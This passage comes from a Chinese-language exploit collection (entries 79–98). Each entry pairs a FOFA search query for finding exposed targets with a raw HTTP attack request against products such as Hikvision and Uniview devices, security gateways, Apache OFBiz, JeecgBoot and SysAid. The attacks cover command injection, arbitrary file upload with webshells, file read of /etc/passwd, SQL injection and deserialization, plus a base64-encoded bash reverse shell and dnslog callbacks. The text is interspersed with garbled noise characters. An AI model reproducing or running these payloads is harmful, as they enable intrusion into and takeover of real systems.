- s+ u% F8 Y& {/ lContent-Type: image/png* E& A. P% B- z; H* u# t( [/ o
1 D* D* u2 K8 e n) |: j
YsOxWxSvj1KyZow1PTsh98fdu6l
; X- T" H, O8 @- K------YsOxWxSvj1KyZow1PTsh98fdu6l
, H( r: f& u" pContent-Disposition: form-data; name="target"# U ~: G7 t f* |
( q, @7 Z$ M1 `1 `& ~
/Applications/SkillDevelopAndEHS/2 K* f4 _! U; @/ c) t, q$ o
------YsOxWxSvj1KyZow1PTsh98fdu6l--1 D8 h+ e' q& j! Q" G
7 X) Q* J- ]! H" }4 p% O8 j! d- Q: [; c# \+ ]
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.16 Q2 c; z: b6 Q5 ?' B+ a1 T+ J: \
Host: x.x.x.x
4 ^$ k# Y# a% G: |* E2 G3 y, t: g0 h& q/ m a" ~
; M1 d; x6 l0 W I$ K4 W
79. BYTEVALUE 百为流控路由器远程命令执行
! {2 O, v7 Z# y d& e/ }$ GFOFA:BYTEVALUE 智能流控路由器6 U" R# j% H9 Y r, |8 `5 U
GET /goform/webRead/open/?path=|id HTTP/1.1
- n4 N' b' V b% lHost:IP
8 M" k7 ~; K7 q/ eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0$ Y! O/ x# Y7 \. @" G, [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 i% }! F- O% c1 \6 \/ \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 L5 K+ L7 @' u; K, BAccept-Encoding: gzip, deflate/ \' M+ u% {9 e# T9 z9 F( d
Connection: close' w2 s% B9 a* ^7 f2 Z7 c
Upgrade-Insecure-Requests: 1
! s* y5 i# K8 m8 J g a
; ]9 \) j2 H' B# U0 }) e+ u
2 M2 O, _: J b( [% m' U2 V6 _80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
! |5 C* m g- C0 b. kFOFA:app="速达软件-公司产品"- J, D! o- n) h: Q
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1* D+ N* o* Q$ t# M
Host: x.x.x.x% h- G% r' c8 n* S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( e2 U, Z" C- wContent-Length: 27
% h% p, V$ T- X. R1 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( F W+ G& t" \2 hAccept-Encoding: gzip, deflate6 o. H0 T# v7 f& x9 H W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: V% e5 j7 }9 E
Connection: close
5 f( r3 A5 I+ h8 P" sContent-Type: application/octet-stream2 x0 Z( z8 X! S5 s2 P
Upgrade-Insecure-Requests: 1
8 _' F$ G1 i! c' N8 K2 o: @! B" u* l! G) o
<% out.print("oessqeonylzaf");%>& d' t9 D6 T1 e- F) w
: V. I5 c- G* R
6 T: n5 y( P1 v; ?, y- LGET /xykqmfxpoas.jsp HTTP/1.1, ]( r4 N( q9 @$ c8 m
Host: x.x.x.x
5 m( |3 G$ g) S. s5 q$ a$ `/ b+ FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ j6 |. Z- [# g5 l$ L
Connection: close
! \& z' u" S1 h4 }1 g! _Accept-Encoding: gzip. h" B" U/ h' X6 F; U3 h, J
; d5 O0 Y* ^0 C3 e& g- G: V
* U- M) i& H7 Z) }" f81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
c! w! A% x3 x; o1 O( c1 FFOFA:app="uniview-视频监控"
9 H8 m- w& _; }1 V5 o0 _2 X3 eGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.12 h' S" s' s2 H+ ` f+ b H9 g0 S; m
Host: x.x.x.x
! u5 y. _8 F- O1 @3 u% [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( M+ e; Y9 b8 Z4 O& \5 sConnection: close
! G, P+ X0 C4 j; a- PAccept-Encoding: gzip
4 Q. B( i0 \6 u; x: ~( k: G$ l Q/ a! h/ ^- j# y
0 N$ ]& v/ K. T
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
6 z$ F+ w5 E% Q5 U2 |8 u$ n* PFOFA:app="思福迪-LOGBASE"
" R! R" L& x6 MPOST /bhost/test_qrcode_b HTTP/1.17 @0 F6 \' k Y+ W3 L' C
Host: BaseURL
& h( I2 R% E% oUser-Agent: Go-http-client/1.1
& `% i( Y. D8 T! C4 kContent-Length: 23: ?2 n$ ?& T' W- t& o3 a
Accept-Encoding: gzip% D2 e4 m) Y2 |+ T: w& k4 B
Connection: close- O0 w" \2 |+ U7 e& m. T5 \! f
Content-Type: application/x-www-form-urlencoded# e! ]* [% o* c1 U3 c
Referer: BaseURL
1 [3 i; }, [ E: [0 O% N9 n# r. q; C9 t; \: V p7 M# `
z1=1&z2="|id;"&z3=bhost
7 |( u! z# x* f4 ~- N3 p- L: U; B# }5 A& s$ T: {) @
* g6 m+ M! f6 C- d0 X& [83. JeecgBoot testConnection 远程命令执行
. s+ Y3 n% M- o8 {8 F" JFOFA:title=="JeecgBoot 企业级低代码平台"3 \5 k) k' o! N0 j5 l0 A
! Y3 T6 H" u i5 U9 [/ J* \, [% Y9 ?* ^; r% }" S: O: _% ~1 a+ c7 |0 y% V
POST /jmreport/testConnection HTTP/1.1$ T. O! ^2 K$ B
Host: x.x.x.x( {, [6 l/ G0 P O3 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) a/ O5 _9 a3 ~; V4 \
Connection: close
& q9 ?! m. L I3 {" tContent-Length: 8881, h- t% [& T8 d
Accept-Encoding: gzip& X# Q; j. W. r) c- [* M# ^
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
o# i0 w, ?0 A" x- B1 b1 \1 iContent-Type: application/json
1 q- q, s. Q/ u$ }8 T" c
: K; ]3 l* i; R6 x- _PAYLOAD
, v2 }4 g6 p0 [+ y E( o2 | O7 S' Q
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入5 F' W* u9 z% _: j Z* S. S' _
FOFA:title=="JeecgBoot 企业级低代码平台"
% A% a0 \& v- L+ ^0 ]( {
+ L+ ~) E& b& g# J0 f6 t
T, M4 L. ?# F# W( }6 [( B* o+ j( a, S) t, Q
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.15 \( P( B& b7 [7 ~/ G
Host: 192.168.40.130:8080. b: R, M9 K3 I( ?+ j
User-Agent: curl/7.88.16 k/ T, C1 y: `9 [& D0 U
Content-Length: 156
# l, G- l" a. o4 qAccept: */*
( ]: G6 X# O8 h4 VConnection: close
! y. {" l$ O! i* ~4 F$ U7 wContent-Type: application/json
% ^) X% ]" l; }; p7 O5 NAccept-Encoding: gzip
1 f5 B f1 T# X4 k+ s/ M" w
7 N. K) f. t6 d, n' R9 w{
. N" z- Y# x6 Y6 Q& A" c "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",* G0 q, P* z$ C8 c: c- H
"type": "0"
; N4 G4 U2 Q) K9 f}
/ E ], \3 D. O4 q: {2 ]' {
/ U' H# i1 ^" J8 V6 G. j8 u0 O- N! ~# c, X7 q7 S8 c# i% g
85. SysAid On-premise< 23.3.36远程代码执行& f3 Q4 Y$ a4 V
CVE-2023-47246- c2 T! ~: h( f# r; j+ N& Z9 l; n
FOFA:body="sysaid-logo-dark-green.png"
# X) [* l5 V: Y) g; c Y# V/ `EXP数据包如下,注入哥斯拉马
* F+ q8 G: k" Z" V# o8 mPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
) V/ U2 o# F# x; vHost: x.x.x.x% x- s, _6 `& s3 m+ K d" A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: V( V" h k, N: H6 @Content-Type: application/octet-stream, O( f ~) W6 w8 A- y4 u( |! X
Accept-Encoding: gzip/ U9 Z7 S# I% L
& i8 c5 y& P+ u; ^6 @8 xPAYLOAD
/ A/ [0 N0 U3 W0 T* r0 y( @2 N2 K$ N0 h
回显URL:http://x.x.x.x/userfiles/index.jsp
7 l8 @0 D2 `1 E. m3 q, P# Q. o- X# e M" ~0 T. D
86. 日本tosei自助洗衣机RCE @8 ?3 v. S, U' r- ~# A3 R
FOFA:body="tosei_login_check.php"% ?7 g u; }, D/ D( F
POST /cgi-bin/network_test.php HTTP/1.1
6 M8 z% Q# D! N$ A, [Host: x.x.x.x
# X8 W: m! u! g# _/ U( H% LUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36! {# ], S$ {' [* x: z8 x5 |, B5 {+ J
Connection: close
$ N; y* {; ]4 @& j/ ]- UContent-Length: 44. ]4 v' s( @) T5 K: `: \
Accept: */*7 V+ m1 k& D: `( m% M% x& ?
Accept-Encoding: gzip' K+ c9 D/ U: ^
Accept-Language: en1 J7 r+ H; r/ I8 t6 W, b6 u
Content-Type: application/x-www-form-urlencoded( |2 o6 z# S" N; |' W$ F: ~
3 l& L7 A# }& l% z$ x8 x
host=%0acat${IFS}/etc/passwd%0a&command=ping
, r+ o% Y) d8 R7 q- y0 `/ K9 f2 N: I
3 R' A* y3 m' s
87. 安恒明御安全网关aaa_local_web_preview文件上传8 M( P5 w/ g6 l) ^
FOFA:title="明御安全网关"
( A6 a( @( L; I& bPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.18 e1 z! u9 d6 Z. ?9 a1 d
Host: X.X.X.X5 e- A2 i( Z) e8 a0 K" z2 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15/ |. y" s6 N" ~7 A0 D& c
Connection: close& @! ^$ X7 Y) t* X% C
Content-Length: 198
: ]4 F6 u7 m9 h6 z$ \* ~Accept-Encoding: gzip
5 {, F! s& g1 g( xContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd% q- P- W6 N1 P% U* V
; Q7 H) c8 D9 E/ T; t+ S3 D; X--qqobiandqgawlxodfiisporjwravxtvd+ F& b/ e; _$ |8 H- S
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php") V: Q) Z/ s' D3 S! J, r
Content-Type: text/plain
! x& o" Q6 M! {# k1 |# @
, V- N8 F; C. Z: [" m2ZqGNnsjzzU2GBBPyd8AIA7QlDq, x: ]7 K& w9 b- u# ]' }/ D
--qqobiandqgawlxodfiisporjwravxtvd--
9 T" \2 X& r0 `) I F: f% R
8 u( C7 [0 a1 J7 L3 a% T0 {4 \$ O2 z- A& k
/jfhatuwe.php7 [. H8 a! g8 A" ^* Y* U
$ {+ k: I( n! S. e: v* k4 Y9 g `
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
/ n9 W( |/ A3 I" jFOFA:title="明御安全网关"
/ \$ C. q; @" ?7 OGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1; ^# f7 l: p5 t% F; O# M
Host: x.x.x.xx.x.x.x
5 s9 p4 p+ a( o6 j& dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* v3 }! [: ]4 SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ s: U, D+ H8 k: y2 `# t/ JAccept-Encoding: gzip, deflate; z4 b4 n% |6 x( `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; G( O8 u5 X+ @: l/ {
Connection: close# _5 ^# g7 M7 H4 |
1 q! \! P, B7 C1 k2 [0 h7 H8 W. w9 A* H
/astdfkhl.php! o6 b( i4 z# W% b% i6 I" x
8 {( s) g0 P: b/ m, c89. 致远互联FE协作办公平台editflow_manager存在sql注入
) \7 p+ `2 I) E3 VFOFA:title="FE协作办公平台" || body="li_plugins_download"
/ R; m2 d) V$ a" h* ?4 JPOST /sysform/003/editflow_manager.js%70 HTTP/1.1: j* \& h4 L& I2 k: ^
Host: x.x.x.x
0 \' T1 l0 h: s/ E x9 d, [User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. ? f4 X- N; M6 E+ J: A- p, K- uConnection: close, F0 |: z' ]; D8 i
Content-Length: 41
# S% g$ u* l& ~& kContent-Type: application/x-www-form-urlencoded0 X2 }7 m- P/ b
Accept-Encoding: gzip
1 l2 X9 I" `9 D2 _# o1 m5 Z
g; p" k+ |( U: ]8 ]/ d, Yoption=2&GUID=-1'+union+select+111*222--+
& W& x% w$ [, @5 B V* |+ c' X* x9 e: s4 k1 m8 J9 t9 ~7 S
( i" |3 ]! x h5 J( F! ~
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
6 ~& D; {& |# Y/ ?5 T& uFOFA:icon_hash="-1830859634"! E! D8 P! _# |
POST /php/ping.php HTTP/1.10 i; N8 W5 ]! _& Z& i6 \
Host: x.x.x.x
5 @3 e( ]0 n& |; t1 z+ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
6 v6 \; n9 `' W2 n# nContent-Length: 51
( V5 U% z( M1 Q: d' I/ lAccept: application/json, text/javascript, */*; q=0.01$ J y* g2 K/ c! [- f, I4 g
Accept-Encoding: gzip, deflate
; l4 O. U: N' x7 Q3 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) V! c5 t: k% i% D6 ?; m, ?Connection: close; c' |( V& E; n/ t$ [5 W
Content-Type: application/x-www-form-urlencoded
1 A+ Y9 {8 V( GX-Requested-With: XMLHttpRequest7 g& |0 F& G. h' ]& E% y2 Y
- ^+ z( O& z. c4 N
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
/ D% y8 w% Y9 t; y3 T- \
4 c, s; b& s. l; n+ X8 b* m
, q- {$ q3 t9 D* s- | j91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
* v5 {& \" V/ P$ E! L# `- pFOFA:title="综合安防管理平台"; ~: N% H7 D7 b# w" w& @* M
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
9 ?# w$ C$ g3 ~0 F. | uHost: your-ip; N: l; R* b# A; B1 j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36( O5 ?. }" J( | F4 ] |1 U
Accept-Encoding: gzip, deflate1 A2 S7 y. H, x7 b! H% k2 H3 @( q
Accept: */*% N; P! j. m& p: n" |3 I
Connection: keep-alive6 a( @2 m, {( u' p' l
$ {7 ]% Z/ M5 y: C3 |( X
! O, m9 p: L& @4 G
" J& p. o1 `" j+ ^92. 海康威视运行管理中心session命令执行
% O) \ l+ y( H/ ]Fastjson命令执行
2 u6 `1 S5 E+ m8 T: m' ^: o9 Xhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
& }" t" \9 G2 a# dPOST /center/api/session HTTP/1.1
0 k1 g: ]5 P/ O$ r+ eHost:0 J0 @$ R6 M% p$ z% u3 q) i
Accept: application/json, text/plain, */*
. \+ V; y' @2 S- ^3 HAccept-Encoding: gzip, deflate
& y% c* ^5 X! o7 z6 _6 v5 JX-Requested-With: XMLHttpRequest
7 z& Z& d) r5 s/ f: ]) L' iContent-Type: application/json;charset=UTF-8
7 ^- y2 r1 \+ Q; ^+ e6 oX-Language-Type: zh_CN! ?+ Q% g& L: Z! }" }
Testcmd: echo test
$ X+ r) ~" f$ M5 c% iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
- M( |9 A/ e, J8 e, E* wAccept-Language: zh-CN,zh;q=0.9
& o" \( r4 g& a3 \) D6 Z$ wContent-Length: 5778( |5 D* X" `) H% K3 @8 b5 ^( l# g
5 Y- J2 Y5 D1 e' E0 J# _' T
PAYLOAD6 n, X( U$ q, Y. C4 J3 K8 |
& j9 C- d7 @1 m. r; A' l% t
$ x$ }& C% v4 k0 n( R7 E93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传. c! E' A! z1 T/ X& a3 g6 w) s
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==". v4 A% b- C3 I0 ^ r# \+ Z4 l' I
POST /?g=app_av_import_save HTTP/1.1
" z K1 R0 T, s3 y8 X- e. QHost: x.x.x.x
; k5 l k1 \) n; O9 L! F+ H6 D; JContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
' N% A8 K( O9 s8 q pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.363 N6 d7 u% {5 J
2 K8 U8 p5 R# [5 t------WebKitFormBoundarykcbkgdfx" J& B- O. Z* y+ z
Content-Disposition: form-data; name="MAX_FILE_SIZE"6 N# V: s, H7 S& d
$ ?$ |* {+ e8 V- H1 H; ~, R3 k7 y
100000007 u G d) J: M1 f
------WebKitFormBoundarykcbkgdfx
" \4 g F0 O/ X5 @: pContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
' M/ Q: O9 u o2 CContent-Type: text/plain
1 ~0 V+ S; [: v1 Z7 ]# r1 }5 ^6 S# ~, N+ W( h) z# N/ L
wagletqrkwrddkthtulxsqrphulnknxa: {) n8 [ s) e5 _% f( D9 X0 q
------WebKitFormBoundarykcbkgdfx+ Z9 _+ |: ^0 ^7 t! G1 E
Content-Disposition: form-data; name="submit_post"
( {: e, H( D: z, E1 e& A8 h( t0 p9 f6 B- t$ U
obj_app_upfile1 q/ N; A; E2 A) y8 \4 v$ d
------WebKitFormBoundarykcbkgdfx
, Y4 Y+ Z! Q" q( z5 u" PContent-Disposition: form-data; name="__hash__"# g* a+ D7 l7 e3 N# a
D, |5 D! [+ A! j6 \; Z4 F
0b9d6b1ab7479ab69d9f71b05e0e9445" Y5 Z: n* o* Z, H5 I2 C4 _
------WebKitFormBoundarykcbkgdfx--
( X$ f& ?4 F6 L G m1 [" `
& U0 y7 ]+ ~" [7 {/ Y( w
' B# ^0 d4 E, t& IGET /attachements/xlskxknxa.txt HTTP/1.1
; S* p6 `4 w6 L! V. zHost: xx.xx.xx.xx9 T' V: p" }" D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
; b. _! I( A. V, D8 Q- m8 d0 ?! B( j8 X: q h
, h* V' o+ G+ Z9 E i' e
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传8 ~ X1 N/ A6 m0 O+ ?6 ~ l3 p6 x
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg==": ?% q$ \: p( h2 [4 y
POST /?g=obj_area_import_save HTTP/1.1
1 ^& c3 ` \, JHost: x.x.x.x
( U8 j" H! x5 v, _2 WContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt- ?' t2 e' } l! d3 g" o) @ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 W5 V2 N! J$ k7 g" Z4 Z2 f
$ ]% {6 M! i7 Y+ ~. o! v( P: z
------WebKitFormBoundarybqvzqvmt- _# K/ z3 S! d0 Q1 }- K
Content-Disposition: form-data; name="MAX_FILE_SIZE"
% f% W1 H) H4 P# `7 ~+ M
2 u/ Q- ^; Q. S* |, {" S* L10000000
: V0 H7 R d, `) G" H) Q- A E------WebKitFormBoundarybqvzqvmt' m7 R! F7 N# T2 s0 T/ h- U* {$ y& X5 G% R
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"$ p+ e2 s* s) ~+ d M+ Q5 ]
Content-Type: text/plain2 Y; I( r" y5 l2 z8 N
# f/ @% z. ?& Wpxplitttsrjnyoafavcajwkvhxindhmu
: J1 l$ }6 X1 u' X------WebKitFormBoundarybqvzqvmt5 ]/ Q4 L- w* ]2 \" z* S% F
Content-Disposition: form-data; name="submit_post"
- l0 n1 m9 ~( p! a9 o& \' r. Z. w" n) P& s' y8 d- a
obj_app_upfile, M% q, M% _# i0 I5 _- l* I
------WebKitFormBoundarybqvzqvmt. T1 M% o4 Z- H2 d) g& G) k0 D S
Content-Disposition: form-data; name="__hash__"
1 g0 k; n0 I2 Y& Y1 W+ J& U, x8 X. G8 y6 F$ F; \, j" O
0b9d6b1ab7479ab69d9f71b05e0e9445
% f4 d4 L; F. P* U------WebKitFormBoundarybqvzqvmt--
+ C5 D" S1 K" N$ N; z
, H4 F3 l/ d# U. u9 S7 e
: J. G7 K: E `0 A9 |- [. g% B( @
" w& ~" f& D- p9 aGET /attachements/xlskxknxa.txt HTTP/1.1& P6 T0 u6 Z- C/ F% Q
Host: xx.xx.xx.xx
+ b: F: \5 A' G$ `User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 }) f+ E# m# U# V8 d' O
k0 E" a$ z4 q! [# z9 j# g$ {# Z/ L4 V! X2 D
+ @: w: [& S+ \# y9 f, w; G95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
. w/ ~. _3 S4 U5 [: X6 N3 rCVE-2023-490708 f& z5 T1 J+ ]" V/ {% T9 |
FOFA:app="Apache_OFBiz": }9 k; m% }" I) G- X. A( E$ c
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1 E/ W% R3 i {1 h2 {! K! M4 a5 y
Host: x.x.x.x" _1 k% e3 L& c+ _- {
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' H3 T' l p9 E7 dConnection: close* m# U. {% V% E! W6 a
Content-Length: 889
* |' L! |" f- o7 CContent-Type: application/xml2 P# H7 v) d& H2 r0 ~6 O
Accept-Encoding: gzip. x4 q0 P6 X1 |
9 }; Q& l1 w$ `* U<?xml version="1.0"?>
2 K V% V4 |) j0 s1 r9 s<methodCall>
* V& i0 @# f! l) y i! E <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>) u& `' e" g$ d( @5 v/ l
<params>' ~+ G# G, o: I( W% `* Z
<param>6 E# s. v" N" l& t0 L! y5 o
<value>
' f. R6 E7 O9 k% S <struct>
/ p' ?0 y1 l1 Z# a' D <member>
5 V0 a% S% S, i; H* h% ` <name>test</name>$ V' S5 S; ^/ Z4 v
<value>
0 v% r- g; g$ {7 P9 L- K/ ` <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>. A$ z0 B1 i. o% D
</value>
1 E% C- ~% g+ j9 L- z0 ? </member>- v0 J4 e/ I8 P' k! u* J0 B! J) K9 ^
</struct>
- E; T' P C, Z4 J9 \% @ </value>
! ?: B: x) w/ b </param>+ Y- r% q' w: e- G! v. j
</params>& R6 Y, [) i Q! j, O7 _9 H/ u
</methodCall>7 b' n- w/ h4 v2 W9 {$ a
- m8 C8 h8 q" K) p6 u( V4 e7 A
, V+ R) B% t0 |9 O" R; X用ysoserial生成payload
3 \2 \ D) ^( O0 tjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
, H/ n% q# g2 X. k' F% K. w% N c1 J v5 u g3 i( y
9 }6 `+ P+ U* _3 u; i0 u将生成的payload替换到上面的POC5 ?- G: t" _# o
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
) v" E# B( Y ?* ~8 LHost: 192.168.40.130:8443
0 [4 b: e- @- ?" t7 {+ R3 F) GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
" t5 b; h6 `( R- {1 H0 g( @8 @6 ^Connection: close8 T7 f* n+ ^3 q
Content-Length: 889$ j: Y6 p0 ?; W) V5 w: Q1 f' e
Content-Type: application/xml& T4 ]7 X! ^# q- E1 Z( [ D
Accept-Encoding: gzip" T5 \& Z! l4 |& F. c
: t) s6 Y' `. b# c' CPAYLOAD
* m' W" a# G( @5 j! m5 n. h6 Y
, b; @3 N, D$ ~# K, w0 q- r96. Apache OFBiz 18.12.11 groovy 远程代码执行
2 G- \" F) a" ]FOFA:app="Apache_OFBiz", o- S) k6 Q; M
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
- t5 S1 d7 M% H5 I, v" X9 T! `Host: localhost:84432 m& g4 _8 [. K- b% I4 a- l0 C! B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
& S- c& P1 a' T+ N0 }% W z ^Accept: */*
3 c# {( N: y# N0 M; l" f5 x" b2 qAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
w v# ?2 ]4 f- F |Content-Type: application/x-www-form-urlencoded. `. l: x/ K& P6 e
Content-Length: 55
% I- Z3 D4 y, F4 L5 p
6 e* e( Y( h8 q2 X: e) lgroovyProgram=throw+new+Exception('id'.execute().text);! n# I$ F/ F* ?/ B# S, W8 c
F3 V+ K+ }$ s% l" Q% A# p
: n2 }$ M" s! P
反弹shell
: n+ ^& B* _0 \/ a( z+ F6 u/ M在kali上启动一个监听9 g: w# ~. U, A. r+ ~3 C
nc -lvp 7777
' p, l$ M. `8 l2 d% e1 b
5 P1 D" } r7 c3 aPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
' `. U0 h: ~/ H, w2 fHost: 192.168.40.130:8443
+ W, u( ]$ r4 P! n6 v( YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
8 S5 b' `/ Y! {, K1 j: hAccept: */*
- z; ?* H$ ^9 h+ QAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 M' l, f0 d' Q) `Content-Type: application/x-www-form-urlencoded2 q$ d" S+ H5 o4 @
Content-Length: 71: l/ e1 c3 c3 L% Q b( G
% ]* u% k6 r8 Q3 a; vgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
4 l) O9 [8 z, W# |" G2 v: p* V3 d, y9 I) G: w, B3 ]0 B
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
3 g* d3 v/ O, i5 T! xFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"; _! h) M8 ]& H7 d& \) g+ F3 f
GET /passport/login/ HTTP/1.1
+ B# }* E# s* m0 XHost: 192.168.40.130:8085
! }: k8 }* O' [4 ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 P# r' N; E- a* Y" ^/ lAccept-Encoding: gzip
' k. o# q9 _/ @- MConnection: close
+ V: G" E6 `1 z3 _: Q$ K5 pCookie: rememberMe=PAYLOAD2 V* [8 }- u' k
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
2 c7 O1 `. Z. _- q: n" Y% L& X0 B, @5 D- L1 O' n+ x2 [; Q4 ^ {
6 r- @) e3 ]. G% s- U0 t98. SpiderFlow爬虫平台远程命令执行
& \& I+ `7 w/ W% gCVE-2024-0195& z% s2 m; L' G
FOFA:app="SpiderFlow"
( K$ i% P. E2 A0 Z9 tPOST /function/save HTTP/1.1
; R9 A! \6 _8 l% k kHost: 192.168.40.130:8088
: e8 ?' V; \) @+ ]3 r# sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 s+ r8 \: [$ n/ \# F" J
Connection: close
